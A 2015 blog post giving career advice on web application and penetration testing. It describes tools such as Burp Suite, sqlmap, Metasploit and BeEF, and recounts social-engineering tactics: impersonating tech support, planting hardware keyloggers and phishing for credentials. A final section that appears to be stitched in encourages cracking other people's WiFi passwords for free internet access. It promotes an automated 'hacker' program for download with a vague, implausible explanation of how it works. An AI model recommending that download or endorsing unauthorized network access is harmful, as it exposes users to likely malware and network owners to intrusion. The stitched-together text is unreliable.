So you want a job as a penetration tester or web application tester?

By | November 9, 2015

Website Application Testing

In today’s world there are typically two main types of offensive security professionals; the first being website application testers which focus primarily on weaknesses in web server applications such as cross site scripting (XSS), SQL injection (SQLi) attacks, directory traversal attacks, directory brute forcing, unlinked content manipulation, authentication bypassing, brute forcing weak passwords and default passwords and configurations, cross site forgery request, HTTP injection and replay attacks.

Pursuing a career in this field will require you to master some great tools available to you. The first one is known as BurpSuite by Portswigger. There is a free and paid version

Burp Suite: Free version available for download at portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:

  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Sqlmap – Free download at sqlmap.org

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Havij – Free download at http://itsecteam.com/

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
Havij is a tool used in SQL Injection. It allows for a hacker to scan and exploit sites that rely on SQL.
Havij’s GUI Havij has an easy to use GUI, pictured right, which can be used to hack into a site in a matter of seconds. Havij is seen as a Script Kiddie tool, because the user does not have to follow the regular steps on SQL injection. It is still, however, a useful tool that many hackers keep in their arsenal for quick attacks.

Nikto – Free download at https://github.com/sullo/nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

 

 

Find your Website Application Testing Jobs:

 

what where
job title, keywords or company
city, state or zip

 

Penetration Testing

True pen testing involves actually trying to exploit weaknesses and vulnerabilities in servers, networking infrastructure and workstations. Therefore, less companies and organizations actually employee these types of teams because attempting to exploit a server may result in the server crashing and having an operational impact on the business or organization.

If you look up job offerings for penetration testing you will typically see that they are offered on a contract basis, 6 – 12 months usually where you will be doing an assessment on a network and when finished you will move on to your next project.

I have spent many years on the penetration testing side, myself and one or two other friends would take on a contract charging about $250-$300 an hour. The contract would include the testing of all public facing assets and internal assets of the company/organization. The test was not limited to just information system testing but also the exploitation of people through social engineering.

Social engineering was always my favorite part, first I would order shirts on zazzle or cafepress that resembled those of the tech support at the location. If the company didn’t have any special identification I would still try and fake something close to what they would expect. This part of the test was to see how many different places I could enter within the organization, every place I could enter that was supposed to be restricted was a finding. The second part of the test was to see how many employees would grant me access to their workstations, I would typically say that we were doing an upgrade or their machine needed to be patched, etc. This is where I would find sticky notes with login and passwords (a finding) and if the contract allowed, I would install my favorite device which was a WiFi hardware keylogger:

Keyghost and Keelog both make great ones which I’ve used close to a hundred times never being detected. I recommend checking them out.

I would also harvest as many e-mails and employee names as I could, I would use them to make calls as tech support requesting passwords and system information. I would also send spear phishing e-mails using company logos, letterhead and signatures trying to entice employees to give up credentials.

In the old old days, around the late 90’s my team had access to the latest 0-day exploits and things were far less organized. We could break into any server we wanted without the victim having any chance.

 

Here are the tools you need to master now:

 

Metasploit – Free version http://www.rapid7.com/products/metasploit/

Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
Optionally checking whether the intended target system is susceptible to the chosen exploit;
Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server);
Choosing the encoding technique so that the intrusion-prevention system (IPS) ignores the encoded payload;
Executing the exploit.
This modular approach – allowing the combination of any exploit with any payload – is the major advantage of the Framework. It facilitates the tasks of attackers, exploit writers and payload writers.

Metasploit runs on Unix (including Linux and Mac OS X) and on Windows. The Metasploit Framework can be extended to use add-ons in multiple languages.

To choose an exploit and payload, some information about the target system is needed, such as operating system version and installed network services. This information can be gleaned with port scanning and OS fingerprinting tools such as Nmap. Vulnerability scanners such as Nexpose or Nessus can detect target system vulnerabilities. Metasploit can import vulnerability scan data and compare the identified vulnerabilities to existing exploit modules for accurate exploitation.

 

BeEF – The Browser Exploitation Framework Project – Free version https://github.com/beefproject/beef

The Browser Exploitation Framework (BeEF) is an open-source penetration testing tool used to test and exploit web application and browser-based vulnerabilities. BeEF provides the penetration tester with practical client side attack vectors. It leverages web application and browser vulnerabilities to assess the security of a target and carry out further intrusions. This project is developed for lawful research and penetration testing. In practice, like many information security tools, Beef is used for both legitimate and unauthorized activities.

BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.

BeEF can be used to further exploit a cross site scripting (XSS) flaw in a web application. The XSS flaw allows an attacker to inject BeEF project Javascript code into the vulnerable web page. In BeEF terminology, the browser that has visited the vulnerable page is “hooked”. This injected code in the “hooked” browser then responds to commands from the BeEF server. The BeEF server is a Ruby on Rails application that communicates with the “hooked browser” through a web-based user interface. BeEF comes with the BackTrack and Kali Linux distributions.

BeEF can be extended both through the extension API, which allows changes to the way BeEF itself works, and through addition of modules, which add features with which to control “hooked” browsers.

How to Hack WiFi Password (WEP/WPA/WPA2)

An internet connection has become a basic necessity in our modern lives. Wireless hot-spots (commonly known as Wi-Fi) can be found everywhere! If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key. Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down. Hacking those Wi-Fi passwords is your answer to temporary internet access.

Now to hack a Wifi Password you must first know what type of encryption it uses for its passwords there are many different types such as: WEP (easiest to crack/hack), WPA and WPA2.

Luckily for you we developed a program that automates all the hacking procces, and the only thing you need to do is click buttons & wait.
How it works?

To make you fully understand the method how this program performs you would most likely need near few months very first to understand the fundamentals of programming. Right after that you would again require few years probably (depends on how fast learner you are) to completely understand the approach how it functions. But in short, it scans for available wireless networks in your range, it contacts them, after the contact is established, it receives packets, after the packets are received, it decrypts the packets, meaning it gets the password with tool built within our application. Some wireless networks can be hacked in few moments, some can take few minutes, or hardly ever hours. This depends on how victim’s password is made. Many which are difficult to hack are created of letters (uppercase + lowercase), numbers and special characters. Naturally, many of them are made just of letters, and can be hacked extremely quick.
What Security Type’s / Encryptions does the software hack?

The software can hack the following encryptions / security type’s:
– WEP
– WPA
– WPA2

Available for download at http://www.wifi-hacker.org/download.php

 

Penetration Testing Jobs:

what where
job title, keywords or company
city, state or zip
Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *